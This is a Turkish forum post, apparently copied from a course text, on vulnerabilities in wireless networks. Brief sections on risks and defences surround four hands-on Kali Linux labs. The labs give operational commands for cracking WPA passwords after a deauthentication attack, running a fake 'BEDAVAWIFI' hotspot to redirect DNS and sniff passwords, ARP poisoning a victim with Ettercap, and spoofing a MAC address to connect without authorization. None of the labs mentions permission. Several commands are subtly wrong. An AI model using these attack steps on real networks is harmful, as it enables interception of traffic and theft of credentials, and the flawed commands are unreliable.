Neler Yeni

KABLOSUZ AĞLARDA GÜVENLİK ZAFİYETLERİ

Katılım
29 Mar 2024
Mesajlar
148
Tepkime puanı
48
Puanları
70
KABLOSUZ AĞLARDA GÜVENLİK ZAFİYETLERİ
Kablosuz ağlar, bilgisayarlar, akıllı telefonlar, tabletler gibi cihazların kablolar olmadan internete veya birbirlerine bağlanmasını sağlayan bir teknolojidir. Kablosuz ağlar, kullanıcıların istedikleri yerden internete erişmesine, veri paylaşmasına, dosya aktarmasına ve çevrimiçi oyun oynamasına olanak tanır. Kablosuz ağlar, kurulumu ve kullanımı kolay, esnek ve hareketli olmaları nedeniyle çok popülerdir.
Ancak, kablosuz ağların da bazı güvenlik sorunları vardır. Kablosuz ağlar, verileri radyo dalgaları aracılığıyla hava ortamında ilettikleri için, yetkisiz kişiler tarafından kolayca izlenebilir, dinlenebilir, bozulabilir veya ele geçirilebilir. Kablosuz ağlara saldıran kişiler, ağın performansını düşürebilir, ağa bağlı cihazlara zarar verebilir, kişisel bilgileri çalabilir veya yasa dışı faaliyetlerde bulunabilir.
Kablosuz ağlardaki güvenlik riskleri, kablolu ağlardaki risklerle benzerdir. Örneğin, virüsler, solucanlar, truva atları, kimlik avı, şifre kırma, hizmet engelleme, ağ izleme gibi saldırılar hem kablolu hem de kablosuz ağlarda görülebilir. Ancak, kablosuz ağlarda bu saldırılar daha kolay ve daha yaygın olabilir, çünkü saldırganların fiziksel olarak ağa bağlı olmasına gerek yoktur. Saldırganlar, ağın kapsama alanı içindeki herhangi bir yerden ağa erişebilir ve ağın güvenlik ayarlarını zayıflatmaya veya devre dışı bırakmaya çalışabilir.
Kablosuz ağlardaki güvenlik zafiyetlerini önlemek veya azaltmak için, kablosuz ağ kullanıcılarının ve yöneticilerinin bazı önlemler alması gerekir. Bu önlemler şunları içerebilir:
- Kablosuz ağın adını (SSID) ve şifresini (WPA/WPA2) değiştirmek ve varsayılan ayarları kullanmamak.
- Kablosuz ağın adını (SSID) yayınlamamak veya gizlemek.
- Kablosuz ağa bağlanan cihazların MAC adreslerini tanımlamak ve sadece bu cihazlara izin vermek.
- Kablosuz ağın şifreleme yöntemini seçmek ve en güvenli olanı kullanmak (WPA2 veya WPA3).
- Kablosuz ağın güvenlik yazılımını ve güncellemelerini düzenli olarak kontrol etmek ve yüklemek.
- Kablosuz ağa bağlanırken güvenilir olmayan veya bilinmeyen ağlardan kaçınmak ve VPN (Sanal Özel Ağ) kullanmak.
Ağ Trafiğinin Dinlenmesi ve Şifrelemenin Çözülmesi
Kablosuz ağlar, internete bağlanmak için kablolu ağlara alternatif bir yöntemdir. Kablosuz ağlarda, bilgisayarlar, telefonlar, tabletler gibi cihazlar, bir erişim noktası adı verilen bir cihaza bağlanır. Erişim noktası, cihazların internete erişmesini sağlar. Kablosuz ağlarda veri, radyo dalgaları şeklinde hava yoluyla iletilir. Bu, verinin kolayca yakalanabileceği anlamına gelir. Yakındaki başka bir kablosuz cihaz, veriyi dinleyebilir ve kaydedebilir. Bu, verinin gizliliğini tehlikeye atar.
Verinin gizliliğini korumak için, kablosuz ağlarda şifreleme adı verilen bir teknik kullanılır. Şifreleme, veriyi anlaşılmaz bir şekilde kodlar. Sadece doğru anahtarı olan cihazlar, veriyi çözebilir ve okuyabilir. Ancak, bazı şifreleme yöntemleri zayıftır ve güvenlik açıkları içerir. Kötü niyetli kişiler, bu açıkları kullanarak şifreli veriyi kırabilir ve ele geçirebilir. Bu, verinin bütünlüğünü ve gizliliğini bozar.
Şifreli veri kırıldığında, verideki bilgiler ortaya çıkar. Bu bilgiler, kablosuz ağ kullanıcılarının kimlikleri, parolaları, e-postaları, internet aktiviteleri, kişisel tercihleri, ilgi alanları gibi hassas ve özel bilgiler olabilir. Bu bilgiler, kötü niyetli kişiler tarafından istismar edilebilir, çalınabilir veya satılabilir. Bu, kablosuz ağ kullanıcılarının mahremiyetini, güvenliğini ve itibarını tehlikeye atar.
Bu nedenle, kablosuz ağlarda veri paylaşımında güçlü ve güvenli bir şifreleme yöntemi kullanmak çok önemlidir. Ayrıca, kablosuz ağ kullanıcılarının, verilerini korumak için başka önlemler de alması gerekir. Örneğin, güvenilir olmayan ağlara bağlanmamak, güncel bir antivirüs programı kullanmak, parolalarını sık sık değiştirmek, şüpheli e-posta ve bağlantılara tıklamamak gibi.
1.
UYGULAMA
Kali Linux İşletim Sistemi Araçlarını Kullanarak Kablosuz Ağda Dinleme, Saldırı Yapma, Veri Paketi Yakalama ve Bu Paketleri Çözümleme
Aşağıdaki işlem adımlarına göre Kali içindeki airdump-ng aracı ile ağ ortamını dinleyiniz, aireplay-ng aracı ile hedef cihaza saldırı yapınız, aircrack-ng aracı ile ele geçirilen veri paketlerini çözümleyiniz ve şifreleri tespit ediniz.
1. Adım: Kali Linux konsol satırına sudo airmon-ng start wlan0 yazarak ağ kartını monitör moda geçiriniz. Bu işlem ile ağ kartınızın kablosuz ağ trafiğini yakalamasını sağlayacaksınız.
2. Adım: Komut satırına sudo iwconfig yazarak, ağ kartının monitör modda olup olmadığını kontrol ediniz. Eğer ağ kartınızın ismi wlan0mon ise monitör modda olduğunu anlayabilirsiniz.
3. Adım: Komut satırına sudo airodump-ng wlan0mon yazarak çevredeki erişim noktalarını tespit ediniz. Bu işlem ile erişim noktalarının MAC adreslerini, kanal numaralarını, sinyal güçlerini, şifreleme türlerini ve SSID'lerini görebilirsiniz.
4. Adım: Hedef cihazın MAC adresini ve kanal numarasını seçiniz. Bu işlem ile saldırı yapmak istediğiniz erişim noktasını belirleyeceksiniz. Örneğin, hedef cihazın MAC adresi 00:11:22:33:44:55 ve kanal numarası 6 olsun.
5. Adım: Komut satırına sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon yazınız. Seçilen hedef cihazı dinlemeye alarak bu cihaza bağlanan istemcileri ve MAC adreslerini bulunuz. Bu işlem ile hedef cihazla el sıkışma olayı (handshake) gerçekleşmesini bekleyeceksiniz.
6. Adım: Komut satırına sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w /root/kali/Desktop/deneme yazınız. Seçilen hedef cihazla belirtilen kanal numarasından bağlantı kurup, yapılan görüşmelerden bir bilgi paketi yakalayarak deneme.cap ismi ile masaüstüne kaydediniz. Bu işlem ile hedef cihazın şifresini kırmak için gerekli olan veri paketini elde edeceksiniz.
7. Adım: Başka bir komut penceresi açınız ve komut satırına sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 –c 66:77:88:99:AA:BB wlan0mon yazınız. Bu işlem ile hedef erişim noktası ve istemci cihaz arasına girerek sahte kimlik doğrulama paketleri gönderiniz. Bu işlemde kullanılan --deauth 0 ile çok sayıda sahte kimlik doğrulama paketini, -a ile parolasını kırmak istediğiniz hedef erişim noktasını, -c ile de hedef erişim cihazına bağlı istemcinin MAC adresini belirttiniz. Bu işlem sonucunda hedef erişim noktasına bağlı cihazın bağlantısı sonlanır ve erişim noktası ile el sıkışma olayı (handshake) gerçekleşir. Bu olayı ilk komut penceresinde görebilirsiniz.
8. Adım: Başka bir komut penceresi açınız ve komut satırına sudo aircrack-ng –w /home/ kali/Desktop/rockyou.txt /home/kali/Desktop/deneme-01.cap yazınız. Bu komut satırı ile yakalanan deneme-01.cap isimli dosya çözümlenmeye başlar ve masaüstünde bulunan rockyou.txt isimli dosyadaki şifrelerle karşılaştırılarak hedef cihazın WPA şifresi kırılır. WPA şifresi rockyou isimli dosya içinde olan bir şifre ise ekranda bu şifreyi gösterir, değilse şifre bulunamadı yazar.
9. Adım: Şifre çözümleme işlemi uzun sürer. Tamamlanan şifre çözümleme işlemi ekran görüntüsü ile karşılaşıncaya kadar bekleyiniz.
Bu adımları takip ederek Kali Linux işletim sistemi araçlarını kullanarak kablosuz ağda dinleme, saldırı yapma, veri paketi yakalama ve bu paketleri çözümleme işlemlerini gerçekleştirebilirsiniz.
Sahte Kablosuz Ağ Oluşturma
Sahte kablosuz ağ oluşturma, kablosuz ağ güvenliğini tehlikeye atan bir saldırı yöntemidir. Bu yöntemde, saldırganlar kablosuz ağa bağlı olan cihazları taklit ederek ya da yeni cihazlar ekleyerek ağ trafiğini yönlendirebilir, izleyebilir veya engelleyebilirler.
Sahte kablosuz ağ oluşturmanın iki yaygın yolu vardır:
Sahte erişim noktası (AP): Bu yöntemde, saldırganlar mevcut bir kablosuz ağın adını, şifresini ve diğer ayarlarını kopyalayarak kendi cihazlarını bir erişim noktası gibi gösterirler. Bu sayede, ağa bağlanmak isteyen kullanıcılar saldırganın cihazına yönlendirilir ve saldırgan kullanıcıların verilerine erişebilir veya onları zararlı sitelere yönlendirebilir.
Sahte istemci: Bu yöntemde, saldırganlar ağa bağlı olan gerçek bir istemci cihazının MAC adresini, IP adresini veya diğer kimlik bilgilerini değiştirerek kendilerini o cihaz gibi tanıtırlar. Bu sayede, ağdaki diğer cihazlar veya erişim noktaları saldırganın cihazını gerçek istemci olarak algılar ve saldırgan ağdaki veri akışını bozabilir veya kesintiye uğratabilir.
Sahte kablosuz ağ oluşturan saldırganlar, kablosuz ağın kaynaklarını kendi amaçları için kullanabilir veya başkalarıyla paylaşabilirler. Örneğin, saldırganlar ağın internet bağlantısını kullanarak yasa dışı faaliyetlerde bulunabilir, ağın bant genişliğini tüketebilir, ağdaki cihazlara zararlı yazılımlar bulaştırabilir veya ağdaki kullanıcıların kişisel bilgilerini çalabilirler.
Sahte kablosuz ağ oluşturmanın önlenmesi için, kablosuz ağın güvenlik ayarlarının düzenli olarak güncellenmesi, şifrelerin güçlü ve değişken olması, ağa bağlanırken erişim noktasının doğrulanması, ağ trafiğinin şifrelenmesi ve kablosuz ağ güvenliği konusunda bilinçli olmak gibi önlemler alınabilir.
2. UYGULAMA
Kali Linux İşletim Sistemi Araçlarını Kullanarak Sahte Kablosuz Ağ Oluşturma
Kali Linux işletim sistemi araçlarını kullanarak sahte kablosuz ağ oluşturma işlemi, bir kablosuz ağ kartı ile etraftaki gerçek kablosuz ağları taklit ederek, ağa bağlanan cihazların trafiğini izlemek veya yönlendirmek için kullanılan bir tekniktir. Bu işlem için aşağıdaki adımları takip edebilirsiniz:
1. Adım: Kali Linux'a ilgili adaptör bağlantısını yaptıktan sonra iwconfig komutu ile arabirimleri görünüz. Bu komut, kablosuz ağ kartınızın ismini ve durumunu gösterir. Örneğin, wlan0 veya wlan1 gibi.
2. Adım: Komut satırına sudo airmon-ng start wlan0 yazarak ağ arabirim kartını monitör moda geçiriniz. Bu komut, kablosuz ağ kartınızı paket yakalamak için hazır hale getirir. Ayrıca, mon0 veya mon1 gibi bir sanal arabirim oluşturur.
3. Adım: Komut satırına sudo airodump-ng wlan0 yazarak etraftaki kablosuz erişim noktalarını keşfediniz. Bu komut, yakındaki kablosuz ağların isimlerini, kanallarını, şifreleme türlerini ve MAC adreslerini gösterir. Bu bilgileri, sahte kablosuz ağ oluşturmak için kullanabilirsiniz.
4. Adım: Komut satırına sudo apt-get install dhcp3-server yazarak DHCP Server'ı yükleyiniz. Bu komut, sahte kablosuz ağa bağlanan cihazlara IP adresi dağıtmak için gerekli olan bir servisi kurar.
5. Adım: DHCP Server yüklenmediyse dosyayı internetten indirip, sudo tar -xvf isc-dhcp-server.tar.gz yazarak yükleyiniz. Bu komut, DHCP Server'ın sıkıştırılmış dosyasını açar ve kurulum dosyalarını içeren bir klasör oluşturur.
6. Adım: Komut satırına dpkg -i isc.dhcp.server.dep yazarak ilgili paketleri yükleyiniz. Bu komut, DHCP Server'ın bağımlılıklarını karşılar ve servisi çalıştırır.
7. Adım: Komut satırına reboot yazarak sistemi yeniden başlatınız. İlgili .dep paketini sisteminize yükledikten sonra Kali'yi yeniden başlatınız. Bu komut, sisteminizdeki değişiklikleri uygular ve servisleri yeniden başlatır.
8. Adım: IP aralığı verebilmek için DHCP servisinin conf dosyasını aşağıdaki gibi düzenleyiniz. Bu komut, sahte kablosuz ağa bağlanan cihazlara hangi IP aralığını, ağ maskesini, yönlendiriciyi ve DNS sunucusunu vereceğinizi belirler. Örneğin, aşağıdaki ayarlarda, cihazlara 10.0.0.1 ile 10.0.0.140 arasında IP adresleri, 255.255.255.0 ağ maskesi, 10.0.0.254 yönlendirici ve 8.8.8.8 DNS sunucusu verilir.
nano /etc/dhcp3/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
9. Adım: Komut satırına airbase-ng -e BEDAVAWIFI -c 11 -v wlan0 yazarak BEDAVAWIFI isimli sahte kablosuz ağı oluşturunuz. Bu komut, monitör modundaki kablosuz ağ kartınızı kullanarak, belirlediğiniz isimde (-e parametresi) ve kanalda (-c parametresi) sahte bir kablosuz ağ yayını yapar. Ayrıca, at0 adında bir sanal arabirim oluşturur.
10. Adım: at0 adında sanal arabirim eklemek için aşağıdaki kod satırlarını yazınız. Bu komutlar, sahte kablosuz ağın IP adresini ve ağ maskesini belirler. Örneğin, aşağıdaki ayarlarda, sahte kablosuz ağın IP adresi 10.0.0.254 ve ağ maskesi 255.255.255.0 olarak ayarlanır.
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
11. Adım: Komut satırına route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 yazarak sahte kablosuz ağ için router ayarlarını yapınız. Bu komut, sahte kablosuz ağa bağlanan cihazların trafiğini yönlendirmek için gerekli olan bir rota ekler. Örneğin, aşağıdaki ayarlarda, 10.0.0.0/24 ağına giden paketler 10.0.0.254 adresine gönderilir.
12. Adım: Sahte kablosuz ağ için iptable ayarlarını aşağıdaki komut satırlarını yazarak oluşturunuz. Bu komutlar, sahte kablosuz ağa bağlanan cihazların internete erişebilmesi için gerekli olan bir NAT (Network Address Translation) kurallarını tanımlar. Örneğin, aşağıdaki ayarlarda, at0 arabiriminden gelen paketler eth0 arabirimine gönderilir ve kaynak IP adresleri eth0 arabirimine ait IP adresi ile değiştirilir.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
13. Adım: Komut satırına dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 & yazarak DHCP servisini başlatınız. Bu komut, sahte kablosuz ağa bağlanan cihazlara IP adresi dağıtmak için gerekli olan DHCP servisini çalıştırır. Servisin ayarları, 8. adımda düzenlediğiniz /etc/dhcp3/dhcpd.conf dosyasından alınır.
14. Adım: Komut satırına echo “1” > /proc/sys/net/ipv4/ip_forward yazarak gelecek IP'leri yönlendiriniz. Bu komut, IP yönlendirmesini etkinleştirir ve sahte kablosuz ağa bağlanan cihazların internete erişebilmesini sağlar.
15. Adım: Bu işlemlerden sonra BEDAVAWIFI isimli sahte kablosuz ağ çalışmaya başlamıştır. Oluşturulan bu sahte kablosuz ağ sayesinde ağa bağlanan cihazların hangi IP numarasını alıp internette hangi sayfalara gittiğine, dnschef ile DNS yönlendirmesi yaparak bakınız veya tcpdump ile HTTP trafiğinde parola bilgilerini görünüz. Bu komutlar, sahte kablosuz ağa bağlanan cihazların aktivitelerini izlemenizi ve analiz etmenizi sağlar. Örneğin, dnschef komutu ile sahte kablosuz ağa bağlanan cihazların istedikleri web sitelerine değil, sizin belirlediğiniz web sitelerine yönlendirilmesini sağlayabilirsiniz. tcpdump komutu ile ise sahte kablosuz ağa bağlanan cihazların gönderdiği ve aldığı paketleri yakalayabilir ve içeriklerini inceleyebilirsiniz.
Ağ Topolojisinin Ortaya Çıkması
Ağ topolojisi, bir ağdaki cihazların ve bağlantıların fiziksel veya mantıksal düzenini ifade eder. Ağ topolojisi, ağın performansını, güvenliğini ve güvenilirliğini etkiler. Ağ topolojisi, yıldız, halka, ağaç, örgü, veri yolu gibi farklı şekillerde olabilir.
Kablosuz ağ, radyo dalgaları veya kızılötesi ışınlar gibi kablosuz iletişim teknolojileri kullanarak cihazları birbirine bağlayan bir ağdır. Kablosuz ağ, kablolu ağlara göre daha esnek, ucuz ve kolay kurulabilirdir. Ancak kablosuz ağ, yetkisiz kişiler tarafından saldırıya daha açıktır.
Kablosuz ağdaki şifreleme, verilerin gizliliğini ve bütünlüğünü korumak için kullanılan bir güvenlik yöntemidir. Şifreleme, verileri anlaşılmaz bir biçime dönüştürerek, sadece doğru anahtarı veya parolayı bilen kişilerin erişebilmesini sağlar. Şifreleme, WEP, WPA, WPA2 gibi farklı protokollerle yapılabilir.
Yetkisiz kişiler, kablosuz ağdaki şifrelemeyi kırmak için çeşitli yöntemler kullanabilir. Örneğin, şifreli veri paketlerini yakalayarak, anahtarı veya parolayı tahmin etmeye çalışabilirler. Ya da sahte bir kablosuz erişim noktası kurarak, kullanıcıları yanıltabilirler.
Veri trafiği, bir ağ üzerindeki veri akışını ifade eder. Veri trafiği, ağın kullanımını, yoğunluğunu, hızını ve kalitesini gösterir. Veri trafiği, ağ analizi, ağ yönetimi, ağ optimizasyonu gibi amaçlarla izlenebilir.
Kurumların iç ağ topolojisi, kurumların kendi bilgisayar, sunucu, yazıcı, telefon, kamera gibi cihazlarını birbirine bağlayan ağın düzenidir. Kurumların iç ağ topolojisi, kurumun işleyişini, verimliliğini ve güvenliğini etkiler. Kurumların iç ağ topolojisi, genellikle kablolu ağlarla oluşturulur.
Yetkisiz kişiler tarafından kablosuz ağdaki şifrelemenin çözülmesi durumunda, veri trafiği izlenerek kurumların iç ağ topolojisi ortaya çıkarılabilir. Bu, kurumların ağ güvenliğini tehlikeye atar. Çünkü yetkisiz kişiler, ağ topolojisini bilmekle, ağdaki zayıf noktaları, önemli cihazları, veri kaynaklarını ve hedeflerini belirleyebilir. Böylece, ağa saldırı düzenleyebilir, verileri çalabilir, değiştirebilir veya bozabilir, ağ performansını düşürebilir, ağ erişimini engelleyebilir veya ağa zararlı yazılımlar bulaştırabilir. Bu da kurumların işleyişini, verimliliğini ve itibarını olumsuz etkileyebilir.
Veri Kaybı ve Veri Kullanma
Veri kaybı ve veri kullanma, kablosuz ağ güvenliği ile ilgili önemli konulardır. Kablosuz ağa yetkisiz bağlanan kişiler, ağdaki bilgisayarların verilerine zarar verebilir veya erişebilirler. Bunun nasıl olabileceğini şöyle açıklayabilirim:
- Verileri ele geçirme: Kablosuz ağa yetkisiz bağlanan kişiler, ağdaki bilgisayarların sabit disklerine, USB belleklere, harici depolama aygıtlarına veya bulut hizmetlerine erişebilirler. Böylece, ağdaki bilgisayarlar üzerinde saklanan verileri kopyalayabilir, silip, değiştirebilir veya başkalarıyla paylaşabilirler. Bu, ağdaki bilgisayarların sahiplerinin gizliliğini, güvenliğini ve mülkiyetini ihlal eder.
- Ağı gizlice izleme: Kablosuz ağa yetkisiz bağlanan kişiler, ağdaki bilgisayarların internete veya birbirlerine gönderdikleri bilgi paketlerini yakalayabilirler. Böylece, ağdaki bilgisayarların internet aktivitelerini, e-postalarını, mesajlarını, dosyalarını, şifrelerini veya kişisel bilgilerini görebilirler. Bu, ağdaki bilgisayarların sahiplerinin gizliliğini, güvenliğini ve kimliğini tehlikeye atar.
- Verileri kullanılmaz hâle getirme: Kablosuz ağa yetkisiz bağlanan kişiler, ağdaki bilgisayarların verilerini bozabilir, şifreleyebilir, silip veya yok edebilirler. Böylece, ağdaki bilgisayarların sahiplerinin verilerini kullanamaz hâle getirebilirler. Bu, ağdaki bilgisayarların sahiplerinin veri kaybına, veri kurtarma maliyetlerine veya veri yedekleme zorunluluğuna neden olur.
IP Numaralarının Yasal Olmayan İşlerde Kullanılması
IP numaraları, internete bağlı olan cihazların birbirlerini tanıyabilmeleri için kullandıkları rakamlardan oluşan adreslerdir. Örneğin, bir web sitesine girdiğinizde, tarayıcınız o sitenin IP numarasını bulmak için bir sorgu yapar ve sonra o IP numarasına bağlanır. IP numaraları, internet servis sağlayıcıları tarafından cihazlara dinamik veya statik olarak atanabilir. Dinamik IP numaraları, her internet bağlantısında değişebilen ve başka cihazlar tarafından da kullanılabilen geçici adreslerdir. Statik IP numaraları ise sabit olan ve belirli cihazlara ait olan adreslerdir.
Yetkisiz kişiler, kablosuz ağa erişerek ağa bağlı cihazların IP numaralarını alabilirler ve yasa dışı işlerde bu IP numaralarını kullanabilirler. Bu, IP numarasının gerçek sahibinin kimliğini gizlemek veya onun adına suç işlemek için yapılabilir. Bu durumda, IP numarası tek başına suçlunun tespiti için yeterli bir delil olmayabilir. Çünkü IP numarası değiştirilebilir, kopyalanabilir veya başka bir cihaza yönlendirilebilir.
ARP (Adres Çözümleme Protokolü), IP adresi bilinen bir bilgisayarın MAC adresini öğrenmeye yarayan bir protokoldür. MAC adresi, cihazın ağ kartına üretici tarafından verilen benzersiz bir tanımlayıcıdır. ARP, IP adresi ile MAC adresi arasında bir eşleme yaparak, aynı ağda bulunan cihazların birbirleriyle veri alışverişi yapmasını sağlar. ARP tablosunda, ağdaki cihazların IP numaraları ve MAC adresleri kaydedilir. ARP tablosuna, Windows işletim sistemlerinde arp -a, Linux işletim sistemlerinde ise arp komutu yazarak ulaşılabilir.
Bir saldırgan, ARP spoofing ile bir şirketten ve kullanıcıdan hassas verileri çalabilir. ARP spoofing, ARP protokolünün güvenlik açıklarını kullanarak, ağdaki cihazların ARP tablolarını değiştirmek ve trafiği yönlendirmek için yapılan bir saldırı türüdür. Saldırgan, kendisinin ağ geçidi veya sunucu gibi önemli bir cihazın IP numarasına sahip olduğunu iddia ederek, ARP tablolarına yanlış bilgiler gönderir. Böylece, ağdaki cihazlar saldırgana güvenir ve onunla veri alışverişi yapar. Saldırgan da bu verileri izleyebilir, değiştirebilir veya engelleyebilir.
3.
UYGULAMA
Kali Linux İşletim Sistemindeki Ettercap Aracını Kullanarak ARP Zehirlemesi Saldırısını Yapma
Kali Linux'ta Ettercap aracını kullanarak ARP zehirleme saldırısı yapmak istiyorsanız, aşağıdaki adımları takip edebilirsiniz:
1. Adım: Kali Linux'a bağlı olduğunuz ağ adaptörünü belirlemek için terminalde iwconfig komutunu çalıştırın. Bu komut size kablosuz ağ kartınızın adını (genellikle wlan0) ve diğer bilgileri gösterecektir.
2. Adım: Ağ kartınızı monitör moduna almak için terminalde sudo airmon-ng start wlan0 komutunu çalıştırın. Bu komut, ağ kartınızın tüm ağ trafiğini yakalamasını sağlayacaktır. Monitör modu başarıyla etkinleştirildiyse, terminalde wlan0mon gibi yeni bir ağ kartı adı göreceksiniz.
3. Adım: ARP zehirleme saldırısı yapmak için terminalde ettercap -G komutunu çalıştırın. Bu komut, Ettercap aracını grafiksel arayüzüyle birlikte açacaktır. Alternatif olarak, Uygulamalar menüsünden Koklama/Sahtecilik > ettercap-graphical seçeneğini de kullanabilirsiniz.
4. Adım: Ettercap arayüzünde, Ayarlar bölümünde, ağ kartınızı seçin. Eğer kablosuz ağ kartı kullanıyorsanız, monitör moduna aldığınız ağ kartının adını (wlan0mon) seçin. Eğer sanal makine içinde bir işletim sistemi hedef cihaz ise, eth0 seçin.
5. Adım: Ağ kartı ayarlarından sonra, host cihazlarını bulmak için tarama yapın. Bunun için, Koklama > Hostlar > Tarama seçeneklerini kullanın. Tarama tamamlandığında, Host Listesi bölümünde ağdaki tüm cihazların IP ve MAC adreslerini görebilirsiniz.
6. Adım: Hedef cihazların IP ve MAC adreslerini listelemek için, Host Listesi bölümünde sağ tıklayın ve Host Listesini Görüntüle seçeneğini seçin. Bu listeden, varsayılan ağ geçidinin IP adresini (genellikle 192.168.1.1) seçerek Hedef 1 butonunu tıklayın. Bu, ağ geçidini birinci hedef olarak belirleyecektir.
7. Adım: Hedef cihazın IP adresini seçerek Hedef 2 butonunu tıklayın. Bu, hedef cihazı ikinci hedef olarak belirleyecektir. Hedeflerinizi belirledikten sonra, Hedefler > Mevcut Hedefleri Görüntüle seçeneğini kullanarak doğrulayabilirsiniz.
8. Adım: Hedefleri belirledikten sonra, sağ üst bölümdeki ARP zehirleme kutucuğunu seçin ve Atağı Başlat butonunu tıklayın. Bu, ARP zehirleme saldırısını başlatacak ve ağ geçidi ile hedef cihaz arasındaki tüm ağ trafiğini bilgisayarınız üzerinden yönlendirecektir.
9. Adım: Bu aşamalardan sonra, bütün ağ trafiğinin bilgisayarınız üzerinden aktığını görebilirsiniz. Wireshark yazılımını kullanarak kurban cihazın ağ ve internet üzerindeki trafiğini izleyebilirsiniz. Wireshark'ı açmak için terminalde wireshark komutunu çalıştırın ve ağ kartınızı seçin. Wireshark, ağ kartınızdan geçen tüm paketleri yakalayacak ve size gösterecektir.
Bu adımları takip ederek, Kali Linux'ta Ettercap aracını kullanarak ARP zehirleme saldırısı yapabilirsiniz. Bu saldırı, ağdaki diğer cihazların ağ geçidini taklit ederek, onların ağ trafiğini ele geçirmenizi sağlar.
Verilen Hizmetin Aksatılması
Siber ataklar, bilgisayar korsanlarının internet üzerinden başka bilgisayar veya ağlara zarar vermek için yaptıkları saldırılardır. Siber ataklar, farklı yöntemlerle gerçekleştirilebilir. Örneğin, virüs, solucan, Truva atı gibi kötü amaçlı yazılımlar kullanarak sisteme sızabilir veya e-posta, mesajlaşma, sosyal medya gibi kanallarla kullanıcıları kandırarak onların bilgilerini ele geçirebilir.
Siber atakların sonucunda, kullanıcıların ağ iletişimi bozulabilir. Ağ iletişimi, kullanıcıların internete bağlanarak web sitelerine erişmesini veya başka kullanıcılarla veri paylaşmasını sağlayan bir süreçtir. Ağ iletişimi için kullanıcılar, kendilerine ait kullanıcı adı ve şifre gibi kimlik bilgilerini kullanırlar. Ancak, siber ataklar nedeniyle bu bilgiler çalınabilir, değiştirilebilir veya engellenebilir. Bu durumda, kullanıcılar ağ iletişimini sağlayamazlar.
Ağ iletişiminin sağlanamaması, işlerin aksamasına neden olabilir. Çünkü, günümüzde pek çok iş, internet üzerinden yürütülmektedir. Örneğin, online alışveriş, bankacılık, eğitim, sağlık, eğlence gibi alanlarda internet kullanımı çok yaygındır. Eğer kullanıcılar, bu alanlarda hizmet veren veya hizmet alan web sitelerine erişemiyorsa, işler yarım kalabilir, verimlilik düşebilir, maddi veya manevi zararlar oluşabilir.
4.
UYGULAMA
Kali Linux İşletim Sistemindeki Macchanger Aracını Kullanarak MAC Adresi Filtrelemelerini Aşma
Aşağıdaki adımları takip ederek, hedef cihazın MAC adresini taklit ederek erişim noktasına yetkisiz bağlanabilirsiniz.
1. Adım: Ağ kartınızı monitör moda almak için, Kali Linux konsolunda sudo airmon-ng start wlan0 komutunu yazın. Bu komut, ağ kartınızın kablosuz ağları dinlemesini sağlar.
2. Adım: Ağ kartınızın monitör modda olduğunu doğrulamak için, sudo iwconfig komutunu yazın. Bu komut, ağ kartınızın adını, MAC adresini, modunu ve diğer bilgilerini gösterir. Ağ kartınızın adının wlan0 olduğundan ve modunun Monitor olduğundan emin olun.
3. Adım: Kablosuz ağları taramak için, sudo airodump-ng wlan0 komutunu yazın. Bu komut, yakındaki kablosuz ağların MAC adreslerini, kanal numaralarını, şifreleme türlerini ve sinyal güçlerini gösterir. Hedef ağın MAC adresini ve kanal numarasını not edin.
4. Adım: Hedef ağın MAC adresini kullanarak, erişim noktasının ve bağlı cihazların bilgilerini elde etmek için, sudo airodump-ng --bssid <Hedef MAC Adresi> -c <kanal no> wlan0 komutunu yazın. Bu komut, hedef ağın BSSID, ESSID, kanal, şifreleme, paket sayısı ve diğer bilgilerini gösterir. Ayrıca, ağa bağlı olan cihazların MAC adreslerini, sinyal güçlerini ve paket sayılarını gösterir. Hedef cihazın MAC adresini not edin.
5. Adım: Kendi MAC adresinizi bulmak için, sudo macchanger --show wlan0 komutunu yazın. Bu komut, ağ kartınızın mevcut MAC adresini ve orijinal MAC adresini gösterir. Mevcut MAC adresinizi not edin.
6. Adım: MAC adresinizi değiştirmek için, ağ kartınızı monitör moddan çıkarmak zorundasınız. Bunun için, sudo ifconfig wlan0 down komutunu yazın. Bu komut, ağ kartınızı devre dışı bırakır.
7. Adım: Hedef cihazın MAC adresini taklit etmek için, sudo macchanger --mac= <Hedef MAC Adresi> wlan0 komutunu yazın. Bu komut, ağ kartınızın MAC adresini hedef cihazın MAC adresiyle aynı yapar. MAC adresinizin değiştiğini doğrulamak için, sudo macchanger --show wlan0 komutunu tekrar yazın.
8. Adım: Bu işlem sonucunda, ağda aynı MAC adresine sahip iki cihaz bulunmaktadır. Bu durum, ağda çakışmaya ve bağlantı sorunlarına neden olabilir. Bu yüzden, hedef cihazı ağdan düşürmek için, sudo aireplay-ng -0 10 -a <Hedef MAC Adresi> -c <Kendi MAC Adresiniz> wlan0 komutunu yazın. Bu komut, hedef cihazla erişim noktası arasındaki bağlantıyı kesmek için 10 adet deauthentication paketi gönderir. Hedef cihazın ağdan düştüğünü görmek için, sudo airodump-ng --bssid <Hedef MAC Adresi> -c <kanal no> wlan0 komutunu tekrar yazın. Hedef cihazın listeden kaybolduğunu göreceksiniz.
9. Adım: Hedef cihazı ağdan düşürdükten sonra, erişim noktasına yetkisiz bağlanmak için, ağ kartınızı monitör moddan çıkarmak ve yönetilen moda almak zorundasınız. Bunun için, sudo ifconfig wlan0 down komutunu yazın. Ardından, sudo iwconfig wlan0 mode managed komutunu yazın. Bu komut, ağ kartınızın modunu yönetilen moda getirir. Son olarak, sudo ifconfig wlan0 up komutunu yazın. Bu komut, ağ kartınızı tekrar etkinleştirir.
